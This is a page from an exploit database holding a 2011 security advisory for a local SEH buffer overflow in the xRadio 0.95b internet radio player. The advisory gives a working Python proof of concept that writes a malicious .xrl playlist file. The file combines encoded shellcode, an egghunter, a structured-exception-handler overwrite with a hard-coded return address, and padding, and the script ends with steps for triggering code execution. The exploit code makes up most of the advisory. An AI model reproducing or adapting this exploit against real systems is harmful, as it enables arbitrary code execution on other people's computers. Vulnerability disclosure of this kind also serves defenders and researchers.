0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)
GotGeek Labs http://www.gotgeek.com.br/ xRadio 0.95b (.xrl) Local Buffer Overflow (SEH) [+] Description With xRadio you can listen internet radio with Windows Media Player Technology (tm). You can setup a radio list and import asx's files. The program stay on the tray bar. [+] Information Title: xRadio 0.95b (.xrl) Local Buffer Overflow (SEH) Advisory: gg-001-2011 Date: 02-08-2011 Last update: 02-08-2011 Link: http://www.gotgeek.com.br/pocs/gg-001-2011.txt Tested on: Windows XP SP3 (VirtualBox) [+] Vulnerability xRadio is affected by stack-based buffer overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Successful exploitation of the vulnerability allows an attacker to execute arbitrary code. Other versions are also affected but have a different trigger. Affected Versions: xRadio 0.95b xRadio 0.9 xRadio 0.5 [+] Proof of Concept/Codes #!/usr/bin/python # # # windows/messagebox - 590 bytes # x86/alpha_upper # http://www.metasploit.com # shellcode = ("\x89\xe1\xd9\xd0\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x43\x43" "\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41" "\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42" "\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50" "\x38\x41\x43\x4a\x4a\x49\x58\x59\x5a\x4b\x4d\x4b\x58\x59\x54" "\x34\x47\x54\x4c\x34\x50\x31\x58\x52\x4e\x52\x43\x47\x50\x31" "\x58\x49\x52\x44\x4c\x4b\x52\x51\x56\x50\x4c\x4b\x54\x36\x54" "\x4c\x4c\x4b\x54\x36\x45\x4c\x4c\x4b\x51\x56\x43\x38\x4c\x4b" "\x43\x4e\x47\x50\x4c\x4b\x56\x56\x50\x38\x50\x4f\x45\x48\x52" "\x55\x5a\x53\x51\x49\x45\x51\x58\x51\x4b\x4f\x4b\x51\x43\x50" "\x4c\x4b\x52\x4c\x51\x34\x47\x54\x4c\x4b\x50\x45\x47\x4c\x4c" "\x4b\x50\x54\x56\x48\x43\x48\x45\x51\x4b\x5a\x4c\x4b\x51\x5a" "\x45\x48\x4c\x4b\x50\x5a\x51\x30\x45\x51\x5a\x4b\x4d\x33\x50" "\x34\x51\x59\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x5a\x4e\x56\x51" "\x4b\x4f\x50\x31\x49\x50\x4b\x4c\x4e\x4c\x4d\x54\x4f\x30\x43" "\x44\x45\x57\x4f\x31\x58\x4f\x54\x4d\x43\x31\x49\x57\x5a\x4b" "\x4c\x34\x47\x4b\x43\x4c\x56\x44\x51\x38\x54\x35\x4b\x51\x4c" "\x4b\x50\x5a\x56\x44\x45\x51\x5a\x4b\x52\x46\x4c\x4b\x54\x4c" "\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x5a\x4b\x4c\x4b\x43" "\x34\x4c\x4b\x45\x51\x4b\x58\x4d\x59\x51\x54\x56\x44\x45\x4c" "\x45\x31\x58\x43\x4f\x42\x45\x58\x51\x39\x49\x44\x4b\x39\x4d" "\x35\x4b\x39\x49\x52\x43\x58\x4c\x4e\x50\x4e\x54\x4e\x5a\x4c" "\x51\x42\x4d\x38\x4d\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4c\x49\x51" "\x55\x54\x44\x4f\x4b\x43\x4e\x4e\x38\x4d\x32\x43\x43\x4b\x37" "\x45\x4c\x56\x44\x56\x32\x5a\x48\x4c\x4e\x4b\x4f\x4b\x4f\x4b" "\x4f\x4b\x39\x51\x55\x45\x58\x43\x58\x52\x4c\x52\x4c\x51\x30" "\x47\x31\x43\x58\x56\x53\x47\x42\x56\x4e\x45\x34\x43\x58\x52" "\x55\x54\x33\x45\x35\x52\x52\x4b\x38\x51\x4c\x56\x44\x54\x4a" "\x4d\x59\x4d\x36\x50\x56\x4b\x4f\x51\x45\x54\x44\x4c\x49\x58" "\x42\x56\x30\x4f\x4b\x4e\x48\x4e\x42\x50\x4d\x4f\x4c\x4c\x47" "\x45\x4c\x51\x34\x50\x52\x5a\x48\x43\x51\x4b\x4f\x4b\x4f\x4b" "\x4f\x45\x38\x43\x52\x52\x52\x51\x48\x47\x50\x45\x38\x52\x43" "\x52\x4f\x52\x4d\x56\x4e\x52\x48\x43\x55\x43\x55\x52\x4b\x56" "\x4e\x52\x48\x45\x37\x52\x4f\x43\x44\x52\x47\x50\x31\x49\x4b" "\x4c\x48\x51\x4c\x56\x44\x54\x4e\x4c\x49\x5a\x43\x52\x48\x52" "\x4c\x43\x58\x50\x30\x56\x38\x43\x58\x45\x32\x56\x50\x52\x54" "\x43\x55\x50\x31\x49\x59\x4b\x38\x50\x4c\x47\x54\x45\x57\x4c" "\x49\x4b\x51\x56\x51\x58\x52\x43\x5a\x47\x30\x50\x53\x50\x51" "\x51\x42\x4b\x4f\x58\x50\x56\x51\x49\x50\x56\x30\x4b\x4f\x50" "\x55\x43\x38\x41\x41") junk = "\x41" * 3248 tag = "\x77\x30\x30\x74\x77\x30\x30\x74" # w00tw00t nops = "\x90" * 230 # Of course we don't need this.. It was just for fun... # egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") # 32 bytes nseh = "\xeb\x88\x90\x90" # jump back 118 bytes seh = "\x82\xe2\x47\x00" # pop eax - pop ebx - ret at 0x0047E282 [xradio.exe] junk2 = "\x42" * 884 try: file = open('b0t.xrl','w'); file.write(junk+tag+shellcode+nops+egghunter+nseh+seh+junk2); file.close(); print "\n[*] gotgeek labs" print "[*] http://gotgeek.com.br\n" print "[+] b0t.xrl created." print "[+] Open xRadio.exe..." print "[+] and Radios >> Edit List >> Save radio list" print "[+] Select the *.xrl file, press Yes and boom!!\n" except: print "\n[-] Error.. Can't write file to system.\n" [+] References http://www.puntoequis.com.ar/aktive/default.aspx?SC=SOFT&ID=xRadio [+] Credits b0telh0 # 0day.today [2024-12-24] #